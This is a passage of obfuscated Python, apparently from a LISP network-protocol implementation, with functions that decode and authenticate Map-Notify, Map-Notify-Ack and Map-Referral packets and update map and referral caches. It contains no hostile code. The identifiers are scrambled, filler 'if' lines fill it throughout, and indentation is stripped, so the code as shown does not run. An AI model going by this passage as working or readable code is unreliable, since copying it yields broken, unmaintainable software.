OOooOo0o0oOoo . append ( o0o000 . print_eid_tuple ( ) )
if 6 - 6: IiII
if 68 - 68: Oo0Ooo
if 83 - 83: OOooOOo / iIii1I11I1II1 . OoO0O00 - oO0o % Oo0Ooo
if 30 - 30: Ii1I . OoOoOO00 / oO0o . OoO0O00
if 93 - 93: i11iIiiIii
if 33 - 33: i1IIi % OoooooooOO + Oo0Ooo % I1IiiI / ooOoO0o
if 40 - 40: IiII % IiII
i111iII = i111iII . encode ( )
i111iII += iII1I1iII1i
i1I1iO0000oOooOoO0 = [ o0o000 . print_eid_tuple ( ) ]
lprint ( " Changed RLOC-set, Map-Notifying old RLOC-set" )
if 9 - 9: I1IiiI * i1IIi + OOooOOo * OoOoOO00
for I1IIiIIIii in ii1iii11IiIii :
if ( I1IIiIIIii . map_notify_requested == False ) : continue
if ( I1IIiIIIii . rloc . is_exact_match ( source ) ) : continue
lisp_build_map_notify ( lisp_sockets , i111iII , i1I1iO0000oOooOoO0 , 1 , I1IIiIIIii . rloc ,
LISP_CTRL_PORT , I1ooo0o00o0Oooo . nonce , I1ooo0o00o0Oooo . key_id ,
I1ooo0o00o0Oooo . alg_id , I1ooo0o00o0Oooo . auth_len , ooo000O0O , False )
if 8 - 8: iII111i
if 51 - 51: I1IiiI
if 72 - 72: ooOoO0o / I1ii11iIi11i . Ii1I * iII111i . iIii1I11I1II1
if 35 - 35: OoO0O00 . OoOoOO00 % O0 * OoO0O00
if 68 - 68: OOooOOo
lisp_notify_subscribers ( lisp_sockets , i111iII , o0o000 . eid , ooo000O0O )
if 87 - 87: IiII * IiII - OoO0O00 / I1ii11iIi11i + OOooOOo / i11iIiiIii
if 21 - 21: o0oOOo0O0Ooo / oO0o + oO0o + Oo0Ooo / o0oOOo0O0Ooo
if 39 - 39: i11iIiiIii - OoO0O00 - i11iIiiIii / OoooooooOO
if 15 - 15: i1IIi . iII111i + IiII / I1ii11iIi11i - i1IIi / iII111i
if 27 - 27: OoOoOO00 / OoooooooOO + i1IIi % iIii1I11I1II1 / OoO0O00
if ( len ( OO0O0O00Oo ) != 0 ) :
lisp_queue_multicast_map_notify ( lisp_sockets , OO0O0O00Oo )
if 73 - 73: I1ii11iIi11i / OoOoOO00 / IiII + oO0o
if 73 - 73: I11i * o0oOOo0O0Ooo * I1IiiI . OoooooooOO % I1Ii111
if 9 - 9: oO0o % I1Ii111 . O0 + I1ii11iIi11i - Ii1I - I1ii11iIi11i
if 57 - 57: i11iIiiIii
if 21 - 21: iIii1I11I1II1 / I1IiiI / iII111i
if 19 - 19: Oo0Ooo / iIii1I11I1II1 / I11i
if ( I1ooo0o00o0Oooo . merge_register_requested ) : return
if 71 - 71: iIii1I11I1II1 * I1IiiI
if 35 - 35: O0
if 10 - 10: Ii1I - I1Ii111 / Oo0Ooo + O0
if 67 - 67: Ii1I % i11iIiiIii . Oo0Ooo
if 78 - 78: I1IiiI - iIii1I11I1II1
if ( I1ooo0o00o0Oooo . map_notify_requested and ooo000O0O != None ) :
lisp_build_map_notify ( lisp_sockets , iI111iIII1I , OOooOo0o0oOoo ,
I1ooo0o00o0Oooo . record_count , source , sport , I1ooo0o00o0Oooo . nonce ,
I1ooo0o00o0Oooo . key_id , I1ooo0o00o0Oooo . alg_id , I1ooo0o00o0Oooo . auth_len ,
ooo000O0O , True )
if 20 - 20: i11iIiiIii % I1IiiI % OoOoOO00
return
if 85 - 85: I11i + OoOoOO00 * O0 * O0
if 92 - 92: i11iIiiIii
if 16 - 16: I11i . ooOoO0o - Oo0Ooo / OoO0O00 . i1IIi
if 59 - 59: ooOoO0o - ooOoO0o % I11i + OoO0O00
if 88 - 88: Ii1I - ooOoO0o . Oo0Ooo
if 83 - 83: I11i + Oo0Ooo . I1ii11iIi11i * I1ii11iIi11i
if 80 - 80: i1IIi * I11i - OOooOOo / II111iiii * iIii1I11I1II1
if 42 - 42: OoOoOO00 . I11i % II111iiii
if 19 - 19: OoooooooOO
if 31 - 31: I11i . OoOoOO00 - O0 * iII111i % I1Ii111 - II111iiii
def lisp_process_multicast_map_notify ( packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
packet = Ii1ii1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 21 - 21: OOooOOo . Oo0Ooo - i1IIi
if 56 - 56: I11i
Ii1ii1 . print_notify ( )
if ( Ii1ii1 . record_count == 0 ) : return
if 24 - 24: I1IiiI . I1IiiI % ooOoO0o
i1ii = Ii1ii1 . eid_records
if 70 - 70: ooOoO0o - IiII * I1Ii111 + I1IiiI / O0 + Oo0Ooo
for IiIIi1IiiIiI in range ( Ii1ii1 . record_count ) :
i111iII = lisp_eid_record ( )
i1ii = i111iII . decode ( i1ii )
if ( packet == None ) : return
i111iII . print_record ( " " , False )
if 27 - 27: oO0o / IiII - iIii1I11I1II1 / o0oOOo0O0Ooo % OOooOOo * iIii1I11I1II1
if 40 - 40: oO0o - II111iiii * OOooOOo % OoooooooOO
if 52 - 52: OOooOOo + OoO0O00
if 96 - 96: OOooOOo % O0 - Oo0Ooo % oO0o / I1IiiI . i1IIi
o0o000Oo = lisp_map_cache_lookup ( i111iII . eid , i111iII . group )
if ( o0o000Oo == None ) :
iII1 , O0O , IIIi1i1iIIIi = lisp_allow_gleaning ( i111iII . eid , i111iII . group ,
None )
if ( iII1 == False ) : continue
if 42 - 42: O0 * iII111i . i1IIi / i11iIiiIii + Ii1I
o0o000Oo = lisp_mapping ( i111iII . eid , i111iII . group , [ ] )
o0o000Oo . add_cache ( )
if 80 - 80: O0 + II111iiii + oO0o . Oo0Ooo * i1IIi
if 8 - 8: Ii1I
if 82 - 82: OOooOOo * Ii1I + I1ii11iIi11i . OoO0O00
if 15 - 15: O0
if 44 - 44: Ii1I . Oo0Ooo . I1Ii111 + oO0o
if 32 - 32: OOooOOo - II111iiii + IiII * iIii1I11I1II1 - Oo0Ooo
if 25 - 25: ooOoO0o
if ( o0o000Oo . gleaned ) :
lprint ( "Ignore Map-Notify for gleaned {}" . format ( green ( o0o000Oo . print_eid_tuple ( ) , False ) ) )
if 33 - 33: Oo0Ooo
continue
if 11 - 11: I11i
if 55 - 55: i11iIiiIii * OoOoOO00 - OoOoOO00 * OoO0O00 / iII111i
o0o000Oo . mapping_source = None if source == "lisp-etr" else source
o0o000Oo . map_cache_ttl = i111iII . store_ttl ( )
if 64 - 64: iIii1I11I1II1 . Ii1I * Oo0Ooo - OoO0O00
if 74 - 74: I1IiiI / o0oOOo0O0Ooo
if 53 - 53: iIii1I11I1II1 * oO0o
if 43 - 43: IiII * Oo0Ooo / OOooOOo % oO0o
if 11 - 11: OoOoOO00 * Oo0Ooo / I11i * OOooOOo
if ( len ( o0o000Oo . rloc_set ) != 0 and i111iII . rloc_count == 0 ) :
o0o000Oo . rloc_set = [ ]
o0o000Oo . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , o0o000Oo )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( o0o000Oo . print_eid_tuple ( ) , False ) ) )
if 15 - 15: ooOoO0o - OOooOOo / OoooooooOO
continue
if 41 - 41: OoOoOO00 . iII111i . i1IIi + oO0o
if 60 - 60: oO0o * I1Ii111
oOOOOOo0 = o0o000Oo . rtrs_in_rloc_set ( )
if 61 - 61: o0oOOo0O0Ooo % oO0o / I1ii11iIi11i . Ii1I % II111iiii
if 22 - 22: iIii1I11I1II1 - OoooooooOO
if 8 - 8: ooOoO0o % i11iIiiIii
if 41 - 41: I1Ii111 . ooOoO0o - i11iIiiIii + Ii1I . OOooOOo . OoOoOO00
if 70 - 70: i1IIi % OoOoOO00 / iII111i + i11iIiiIii % ooOoO0o + IiII
for OO00O0O in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
i1ii = I1Ii11iI . decode ( i1ii , None )
I1Ii11iI . print_record ( " " )
if ( i111iII . group . is_null ( ) ) : continue
if ( I1Ii11iI . rle == None ) : continue
if 58 - 58: OOooOOo / i11iIiiIii . Oo0Ooo % iII111i
if 92 - 92: OoOoOO00 / ooOoO0o % iII111i / iIii1I11I1II1
if 73 - 73: O0 % i11iIiiIii
if 16 - 16: O0
if 15 - 15: i1IIi % i11iIiiIii
I1i1IIiIIiIiIi = o0o000Oo . rloc_set [ 0 ] . stats if len ( o0o000Oo . rloc_set ) != 0 else None
if 97 - 97: Ii1I + I1Ii111 / II111iiii
if 14 - 14: iII111i / IiII / oO0o
if 55 - 55: OoO0O00 % O0
if 92 - 92: OoooooooOO / O0
I1IIiIIIii = lisp_rloc ( )
I1IIiIIIii . store_rloc_from_record ( I1Ii11iI , None , o0o000Oo . mapping_source )
if ( I1i1IIiIIiIiIi != None ) : I1IIiIIIii . stats = copy . deepcopy ( I1i1IIiIIiIiIi )
if 14 - 14: i11iIiiIii
if ( oOOOOOo0 and I1IIiIIIii . is_rtr ( ) == False ) : continue
if 43 - 43: OOooOOo
o0o000Oo . rloc_set = [ I1IIiIIIii ]
o0o000Oo . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , o0o000Oo )
if 79 - 79: iII111i % Oo0Ooo . i1IIi % ooOoO0o
lprint ( "Update {} map-cache entry with RLE {}" . format ( green ( o0o000Oo . print_eid_tuple ( ) , False ) ,
# OoOoOO00 . IiII + i1IIi * OOooOOo % I11i * i11iIiiIii
I1IIiIIIii . rle . print_rle ( False , True ) ) )
if 76 - 76: iIii1I11I1II1 * OoooooooOO % oO0o * O0 - i11iIiiIii + OoO0O00
if 19 - 19: i1IIi
return
if 53 - 53: OOooOOo * O0 . iII111i
if 3 - 3: OoooooooOO * I1Ii111 * IiII - OOooOOo * I1Ii111
if 78 - 78: iII111i
if 80 - 80: i1IIi * I1IiiI + OOooOOo
if 91 - 91: I1IiiI % OoOoOO00 * Oo0Ooo / I1ii11iIi11i
if 57 - 57: i11iIiiIii / o0oOOo0O0Ooo . II111iiii
if 63 - 63: O0
if 64 - 64: i11iIiiIii / oO0o . oO0o - Oo0Ooo
def lisp_process_map_notify ( lisp_sockets , orig_packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
IiiiIi1iiii11 = Ii1ii1 . decode ( orig_packet )
if ( IiiiIi1iiii11 == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 48 - 48: i1IIi + I1ii11iIi11i + I1Ii111 - iII111i
if 3 - 3: i1IIi + OoooooooOO * ooOoO0o + I1Ii111 % OOooOOo / IiII
Ii1ii1 . print_notify ( )
if 70 - 70: oO0o + i1IIi % o0oOOo0O0Ooo - I11i
if 74 - 74: i11iIiiIii
if 93 - 93: I1Ii111 % OOooOOo * I1IiiI % iII111i / iIii1I11I1II1 + OoO0O00
if 6 - 6: I11i
if 70 - 70: ooOoO0o + OoooooooOO % OoOoOO00 % oO0o / Ii1I . I11i
IiII1iiI = source . print_address ( )
if ( Ii1ii1 . alg_id != 0 or Ii1ii1 . auth_len != 0 ) :
ii1iOo = None
for Oo000O000 in lisp_map_servers_list :
if ( Oo000O000 . find ( IiII1iiI ) == - 1 ) : continue
ii1iOo = lisp_map_servers_list [ Oo000O000 ]
if 63 - 63: I1ii11iIi11i - ooOoO0o . OOooOOo / O0 . iIii1I11I1II1 - Ii1I
if ( ii1iOo == None ) :
lprint ( ( " Could not find Map-Server {} to authenticate " + "Map-Notify" ) . format ( IiII1iiI ) )
if 6 - 6: Ii1I
return
if 60 - 60: iII111i + I1IiiI
if 36 - 36: i1IIi . O0 . OoO0O00 % OOooOOo * I11i / Ii1I
ii1iOo . map_notifies_received += 1
if 16 - 16: Oo0Ooo
I1iiIIiIII1i = lisp_verify_auth ( IiiiIi1iiii11 , Ii1ii1 . alg_id ,
Ii1ii1 . auth_data , ii1iOo . password )
if 44 - 44: iIii1I11I1II1 - II111iiii . IiII . i1IIi
lprint ( " Authentication {} for Map-Notify" . format ( "succeeded" if I1iiIIiIII1i else "failed" ) )
if 37 - 37: OoooooooOO + Oo0Ooo - Oo0Ooo + I1ii11iIi11i . I1Ii111 / I1IiiI
if ( I1iiIIiIII1i == False ) : return
else :
ii1iOo = lisp_ms ( IiII1iiI , None , "" , 0 , "" , False , False , False , False , 0 , 0 , 0 ,
None )
if 60 - 60: I1IiiI % Ii1I / I1Ii111 + Ii1I
if 43 - 43: I1ii11iIi11i + I11i
if 83 - 83: II111iiii + o0oOOo0O0Ooo - I1Ii111
if 100 - 100: IiII - OoOoOO00 / I11i
if 33 - 33: I1Ii111 * OoOoOO00 . I1ii11iIi11i % I1Ii111
if 87 - 87: Oo0Ooo
i1ii = Ii1ii1 . eid_records
if ( Ii1ii1 . record_count == 0 ) :
lisp_send_map_notify_ack ( lisp_sockets , i1ii , Ii1ii1 , ii1iOo )
return
if 65 - 65: ooOoO0o . I1IiiI
if 51 - 51: IiII
if 43 - 43: oO0o - I11i . i11iIiiIii
if 78 - 78: i11iIiiIii + Oo0Ooo * Ii1I - o0oOOo0O0Ooo % i11iIiiIii
if 30 - 30: I1IiiI % oO0o * OoooooooOO
if 64 - 64: I1IiiI
if 11 - 11: I1ii11iIi11i % iII111i / II111iiii % ooOoO0o % IiII
if 14 - 14: ooOoO0o / IiII . o0oOOo0O0Ooo
i111iII = lisp_eid_record ( )
IiiiIi1iiii11 = i111iII . decode ( i1ii )
if ( IiiiIi1iiii11 == None ) : return
if 27 - 27: I1IiiI - OOooOOo . II111iiii * I1ii11iIi11i % ooOoO0o / I1IiiI
i111iII . print_record ( " " , False )
if 90 - 90: o0oOOo0O0Ooo / I1ii11iIi11i - oO0o - Ii1I - I1IiiI + I1Ii111
for OO00O0O in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
IiiiIi1iiii11 = I1Ii11iI . decode ( IiiiIi1iiii11 , None )
if ( IiiiIi1iiii11 == None ) :
lprint ( " Could not decode RLOC-record in Map-Notify packet" )
return
if 93 - 93: I1IiiI - I11i . I1IiiI - iIii1I11I1II1
I1Ii11iI . print_record ( " " )
if 1 - 1: O0 . Ii1I % Ii1I + II111iiii . oO0o
if 24 - 24: o0oOOo0O0Ooo . I1Ii111 % O0
if 67 - 67: I1IiiI * Ii1I
if 64 - 64: OOooOOo
if 90 - 90: iII111i . OoOoOO00 + i1IIi % ooOoO0o * I11i + OoooooooOO
if ( i111iII . group . is_null ( ) == False ) :
if 2 - 2: o0oOOo0O0Ooo . II111iiii
if 9 - 9: I1Ii111 - II111iiii + OoOoOO00 . OoO0O00
if 33 - 33: Oo0Ooo
if 12 - 12: i11iIiiIii . Oo0Ooo / OoOoOO00 + iII111i . Ii1I + ooOoO0o
if 66 - 66: IiII
lprint ( "Send {} Map-Notify IPC message to ITR process" . format ( green ( i111iII . print_eid_tuple ( ) , False ) ) )
if 41 - 41: II111iiii + Oo0Ooo / iII111i . IiII / iII111i / I1IiiI
if 78 - 78: o0oOOo0O0Ooo % OoOoOO00 . O0
iiiii1i1 = lisp_control_packet_ipc ( orig_packet , IiII1iiI , "lisp-itr" , 0 )
lisp_ipc ( iiiii1i1 , lisp_sockets [ 2 ] , "lisp-core-pkt" )
if 41 - 41: iIii1I11I1II1 . OOooOOo - Oo0Ooo % OOooOOo
if 90 - 90: i11iIiiIii + OoooooooOO - i11iIiiIii + OoooooooOO
if 23 - 23: i11iIiiIii - IiII - I1ii11iIi11i + I1ii11iIi11i % I1IiiI
if 79 - 79: II111iiii / OoooooooOO
if 35 - 35: i1IIi + IiII + II111iiii % OOooOOo
lisp_send_map_notify_ack ( lisp_sockets , i1ii , Ii1ii1 , ii1iOo )
return
if 25 - 25: I11i + i11iIiiIii + O0 - Ii1I
if 69 - 69: I11i . OoOoOO00 / OOooOOo / i1IIi . II111iiii
if 17 - 17: I1Ii111
if 2 - 2: O0 % OoOoOO00 + oO0o
if 24 - 24: iII111i + iII111i - OoooooooOO % OoooooooOO * O0
if 51 - 51: IiII
if 31 - 31: I11i - iIii1I11I1II1 * Ii1I + Ii1I
if 10 - 10: OoOoOO00 - i11iIiiIii % iIii1I11I1II1 / ooOoO0o * i11iIiiIii - Ii1I
def lisp_process_map_notify_ack ( packet , source ) :
Ii1ii1 = lisp_map_notify ( "" )
packet = Ii1ii1 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify-Ack packet" )
return
if 64 - 64: II111iiii . i11iIiiIii . iII111i . OOooOOo
if 95 - 95: O0 - OoOoOO00
Ii1ii1 . print_notify ( )
if 68 - 68: ooOoO0o . I1Ii111
if 84 - 84: OoooooooOO + oO0o % i1IIi + o0oOOo0O0Ooo * i1IIi
if 51 - 51: oO0o . OoooooooOO + OOooOOo * I1ii11iIi11i - ooOoO0o
if 41 - 41: Oo0Ooo
if 46 - 46: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii . iII111i
if ( Ii1ii1 . record_count < 1 ) :
lprint ( "No EID-prefix found, cannot authenticate Map-Notify-Ack" )
return
if 66 - 66: oO0o % i1IIi % OoooooooOO
if 58 - 58: OOooOOo
i111iII = lisp_eid_record ( )
if 89 - 89: iIii1I11I1II1 - i1IIi
if ( i111iII . decode ( Ii1ii1 . eid_records ) == None ) :
lprint ( "Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack" )
return
if 26 - 26: OOooOOo - iII111i * I1ii11iIi11i / iII111i
i111iII . print_record ( " " , False )
if 9 - 9: I1Ii111 / II111iiii * I1Ii111 / I11i - OoO0O00
I11i11i1 = i111iII . print_eid_tuple ( )
if 36 - 36: IiII . OoOoOO00 . Ii1I
if 31 - 31: iIii1I11I1II1
if 84 - 84: I1ii11iIi11i - iII111i * I1IiiI
if 88 - 88: OOooOOo / Oo0Ooo
if ( Ii1ii1 . alg_id != LISP_NONE_ALG_ID and Ii1ii1 . auth_len != 0 ) :
o0o000 = lisp_sites_by_eid . lookup_cache ( i111iII . eid , True )
if ( o0o000 == None ) :
iiiII = bold ( "Site not found" , False )
lprint ( ( "{} for EID {}, cannot authenticate Map-Notify-Ack" ) . format ( iiiII , green ( I11i11i1 , False ) ) )
if 31 - 31: II111iiii
return
if 32 - 32: o0oOOo0O0Ooo % o0oOOo0O0Ooo
ooo000O0O = o0o000 . site
if 67 - 67: IiII + oO0o * IiII
if 26 - 26: I1ii11iIi11i + i1IIi . i1IIi - oO0o + I1IiiI * o0oOOo0O0Ooo
if 62 - 62: ooOoO0o + ooOoO0o % I11i
if 100 - 100: II111iiii . OoooooooOO
ooo000O0O . map_notify_acks_received += 1
if 32 - 32: I11i % OOooOOo * O0 / iIii1I11I1II1 / i1IIi
I1I1I1 = Ii1ii1 . key_id
if ( ooo000O0O . auth_key . has_key ( I1I1I1 ) ) :
o0Oooo00oO0o00 = ooo000O0O . auth_key [ I1I1I1 ]
else :
o0Oooo00oO0o00 = ""
if 87 - 87: OoO0O00 . I1ii11iIi11i * I1IiiI
if 83 - 83: OOooOOo
I1iiIIiIII1i = lisp_verify_auth ( packet , Ii1ii1 . alg_id ,
Ii1ii1 . auth_data , o0Oooo00oO0o00 )
if 86 - 86: I1Ii111 / oO0o
I1I1I1 = "key-id {}" . format ( I1I1I1 ) if I1I1I1 == Ii1ii1 . key_id else "bad key-id {}" . format ( Ii1ii1 . key_id )
if 67 - 67: OoOoOO00 + Oo0Ooo / i11iIiiIii . I1IiiI
if 53 - 53: Oo0Ooo + IiII * ooOoO0o % OoooooooOO * oO0o . iII111i
lprint ( " Authentication {} for Map-Notify-Ack, {}" . format ( "succeeded" if I1iiIIiIII1i else "failed" , I1I1I1 ) )
if 78 - 78: O0 . Ii1I - I1ii11iIi11i
if ( I1iiIIiIII1i == False ) : return
if 69 - 69: O0 % O0 . oO0o * OoooooooOO
if 13 - 13: i1IIi % oO0o . OoooooooOO + I1ii11iIi11i - OOooOOo
if 99 - 99: OoooooooOO % OOooOOo / I11i
if 77 - 77: II111iiii - IiII % OOooOOo
if 22 - 22: OoooooooOO / oO0o
if ( Ii1ii1 . retransmit_timer ) : Ii1ii1 . retransmit_timer . cancel ( )
if 78 - 78: oO0o * I11i . i1IIi % i1IIi + i1IIi / OOooOOo
I1i1i = source . print_address ( )
Oo000O000 = Ii1ii1 . nonce_key
if 66 - 66: OoooooooOO % o0oOOo0O0Ooo / I11i * I1Ii111
if ( lisp_map_notify_queue . has_key ( Oo000O000 ) ) :
Ii1ii1 = lisp_map_notify_queue . pop ( Oo000O000 )
if ( Ii1ii1 . retransmit_timer ) : Ii1ii1 . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( Oo000O000 ) )
if 12 - 12: I1Ii111
else :
lprint ( "Map-Notify with nonce 0x{} queue entry not found for {}" . format ( Ii1ii1 . nonce_key , red ( I1i1i , False ) ) )
if 17 - 17: I1Ii111 % oO0o + O0
if 15 - 15: o0oOOo0O0Ooo - OoooooooOO % ooOoO0o % oO0o / i11iIiiIii / Oo0Ooo
return
if 59 - 59: iII111i + O0 - I1ii11iIi11i * I1ii11iIi11i + iIii1I11I1II1
if 41 - 41: iIii1I11I1II1 . O0 - ooOoO0o / OoOoOO00 % iIii1I11I1II1 + IiII
if 23 - 23: OoOoOO00 + ooOoO0o . i11iIiiIii
if 39 - 39: OoOoOO00 - I1ii11iIi11i / I1Ii111
if 48 - 48: IiII - oO0o + I11i % o0oOOo0O0Ooo
if 81 - 81: Oo0Ooo . I1Ii111 * iIii1I11I1II1
if 60 - 60: OoooooooOO
if 41 - 41: iIii1I11I1II1 + O0 % o0oOOo0O0Ooo - IiII . I11i * O0
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
if ( action not in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) : return ( False )
if 39 - 39: i11iIiiIii . Ii1I
if ( mr . last_cached_prefix [ 0 ] == None ) : return ( False )
if 68 - 68: OOooOOo * ooOoO0o . I1IiiI - iII111i
if 81 - 81: I11i % Oo0Ooo / iII111i
if 44 - 44: Oo0Ooo
if 90 - 90: Oo0Ooo . ooOoO0o / IiII * I1Ii111 . ooOoO0o + II111iiii
OOOoOoOO0oo = False
if ( group . is_null ( ) == False ) :
OOOoOoOO0oo = mr . last_cached_prefix [ 1 ] . is_more_specific ( group )
if 43 - 43: iIii1I11I1II1 % OOooOOo + OoOoOO00 + I1ii11iIi11i - Oo0Ooo / Ii1I
if ( OOOoOoOO0oo == False ) :
OOOoOoOO0oo = mr . last_cached_prefix [ 0 ] . is_more_specific ( eid )
if 94 - 94: Ii1I / Oo0Ooo % II111iiii % Oo0Ooo * oO0o
if 54 - 54: O0 / ooOoO0o * I1Ii111
if ( OOOoOoOO0oo ) :
iIIiIIiII111 = lisp_print_eid_tuple ( eid , group )
I1II1 = lisp_print_eid_tuple ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] )
if 7 - 7: Oo0Ooo . IiII + I1ii11iIi11i
lprint ( ( "Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}" ) . format ( green ( iIIiIIiII111 , False ) , s ,
# O0 * I11i % OOooOOo
I1II1 ) )
if 28 - 28: I1IiiI . OOooOOo
return ( OOOoOoOO0oo )
if 27 - 27: ooOoO0o + o0oOOo0O0Ooo . i11iIiiIii * i1IIi % I11i - IiII
if 99 - 99: OoO0O00 * oO0o / Ii1I + OoO0O00
if 57 - 57: iIii1I11I1II1 + I1Ii111 % oO0o - Ii1I . I1IiiI
if 39 - 39: OoO0O00 + II111iiii
if 98 - 98: O0 - I1Ii111 % oO0o - iII111i + Ii1I * i1IIi
if 76 - 76: o0oOOo0O0Ooo
if 55 - 55: OOooOOo + I1ii11iIi11i * Oo0Ooo
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
if 11 - 11: i1IIi - OoooooooOO * OoOoOO00 / oO0o - OoooooooOO - I1IiiI
iiII1IiIi1i = lisp_map_referral ( )
packet = iiII1IiIi1i . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Referral packet" )
return
if 22 - 22: i11iIiiIii . Ii1I . Oo0Ooo * Oo0Ooo - iII111i / I1ii11iIi11i
iiII1IiIi1i . print_map_referral ( )
if 49 - 49: iII111i + I11i . Oo0Ooo
IiII1iiI = source . print_address ( )
Iii11I = iiII1IiIi1i . nonce
if 23 - 23: I1IiiI . Ii1I + ooOoO0o . OoooooooOO
if 57 - 57: OOooOOo / OoOoOO00 / i11iIiiIii - I11i - I11i . Ii1I
if 53 - 53: ooOoO0o . iII111i + Ii1I * I1Ii111
if 49 - 49: II111iiii . I1ii11iIi11i * OoOoOO00 - OOooOOo
for IiIIi1IiiIiI in range ( iiII1IiIi1i . record_count ) :
i111iII = lisp_eid_record ( )
packet = i111iII . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Referral packet" )
return
if 48 - 48: OoO0O00 . iIii1I11I1II1 - OoooooooOO + I1Ii111 / i11iIiiIii . Oo0Ooo
i111iII . print_record ( " " , True )
if 61 - 61: II111iiii + OOooOOo . o0oOOo0O0Ooo . iIii1I11I1II1
if 63 - 63: I11i + i11iIiiIii . o0oOOo0O0Ooo . i1IIi + OoOoOO00
if 1 - 1: i11iIiiIii
if 1 - 1: iIii1I11I1II1
Oo000O000 = str ( Iii11I )
if ( Oo000O000 not in lisp_ddt_map_requestQ ) :
lprint ( ( "Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored" ) . format ( lisp_hex_string ( Iii11I ) , IiII1iiI ) )
if 73 - 73: iII111i + IiII
if 95 - 95: O0
continue
if 75 - 75: ooOoO0o
I1I1iiii111II = lisp_ddt_map_requestQ [ Oo000O000 ]
if ( I1I1iiii111II == None ) :
lprint ( ( "No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored" ) . format ( lisp_hex_string ( Iii11I ) , IiII1iiI ) )
if 8 - 8: O0 - OoooooooOO + I1ii11iIi11i / Oo0Ooo . oO0o + I1Ii111
continue
if 85 - 85: ooOoO0o
if 29 - 29: iII111i . Ii1I
if 43 - 43: I11i - I1ii11iIi11i + iIii1I11I1II1 / I1ii11iIi11i * oO0o / iIii1I11I1II1
if 45 - 45: IiII
if 49 - 49: I1IiiI . Ii1I * I1IiiI - OoooooooOO . I11i / I1Ii111
if 9 - 9: iIii1I11I1II1 * Ii1I / O0 - OOooOOo
if ( lisp_map_referral_loop ( I1I1iiii111II , i111iII . eid , i111iII . group ,
i111iII . action , IiII1iiI ) ) :
I1I1iiii111II . dequeue_map_request ( )
continue
if 95 - 95: i11iIiiIii * II111iiii * OOooOOo * iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 / I1IiiI + OoOoOO00 - OOooOOo . i11iIiiIii / i11iIiiIii
I1I1iiii111II . last_cached_prefix [ 0 ] = i111iII . eid
I1I1iiii111II . last_cached_prefix [ 1 ] = i111iII . group
if 10 - 10: iIii1I11I1II1 % i1IIi
if 78 - 78: I11i + II111iiii % o0oOOo0O0Ooo
if 17 - 17: i11iIiiIii + oO0o * iII111i . II111iiii
if 44 - 44: I1ii11iIi11i
iI1I11II = False
oo0oooo00OOO = lisp_referral_cache_lookup ( i111iII . eid , i111iII . group ,
True )
if ( oo0oooo00OOO == None ) :
iI1I11II = True
oo0oooo00OOO = lisp_referral ( )
oo0oooo00OOO . eid = i111iII . eid
oo0oooo00OOO . group = i111iII . group
if ( i111iII . ddt_incomplete == False ) : oo0oooo00OOO . add_cache ( )
elif ( oo0oooo00OOO . referral_source . not_set ( ) ) :
lprint ( "Do not replace static referral entry {}" . format ( green ( oo0oooo00OOO . print_eid_tuple ( ) , False ) ) )
if 39 - 39: iII111i + Oo0Ooo / oO0o
I1I1iiii111II . dequeue_map_request ( )
continue
if 95 - 95: I1Ii111 * oO0o / ooOoO0o . Ii1I . OoOoOO00
if 99 - 99: I1IiiI * II111iiii
I11I1iI = i111iII . action
oo0oooo00OOO . referral_source = source
oo0oooo00OOO . referral_type = I11I1iI
oOoooOOO0o0 = i111iII . store_ttl ( )
oo0oooo00OOO . referral_ttl = oOoooOOO0o0
oo0oooo00OOO . expires = lisp_set_timestamp ( oOoooOOO0o0 )
if 84 - 84: II111iiii - I1IiiI
if 41 - 41: iIii1I11I1II1 % I1Ii111 % OoOoOO00
if 35 - 35: I11i + i1IIi
if 85 - 85: Ii1I * Ii1I . OoOoOO00 / Oo0Ooo
oOo000oOoO = oo0oooo00OOO . is_referral_negative ( )
if ( oo0oooo00OOO . referral_set . has_key ( IiII1iiI ) ) :
iiI111I = oo0oooo00OOO . referral_set [ IiII1iiI ]
if 65 - 65: I11i % OoooooooOO
if ( iiI111I . updown == False and oOo000oOoO == False ) :
iiI111I . updown = True
lprint ( "Change up/down status for referral-node {} to up" . format ( IiII1iiI ) )
if 11 - 11: I1IiiI + IiII
elif ( iiI111I . updown == True and oOo000oOoO == True ) :
iiI111I . updown = False
lprint ( ( "Change up/down status for referral-node {} " + "to down, received negative referral" ) . format ( IiII1iiI ) )
if 97 - 97: i1IIi * ooOoO0o
if 18 - 18: i1IIi . I1IiiI % I1IiiI / iII111i + Ii1I * o0oOOo0O0Ooo
if 97 - 97: Ii1I % I1IiiI % iIii1I11I1II1 * Ii1I . i1IIi
if 70 - 70: i1IIi . oO0o - oO0o . I1Ii111
if 68 - 68: I1Ii111 . iIii1I11I1II1 * O0
if 75 - 75: iII111i - Oo0Ooo / OoooooooOO - O0
if 36 - 36: OoO0O00 % Ii1I . Oo0Ooo
if 90 - 90: i11iIiiIii - iII111i * oO0o
oOo0OooOoooO = { }
for Oo000O000 in oo0oooo00OOO . referral_set : oOo0OooOoooO [ Oo000O000 ] = None
if 23 - 23: I1IiiI % iIii1I11I1II1 - oO0o - iII111i - o0oOOo0O0Ooo
if 39 - 39: Oo0Ooo . OoO0O00
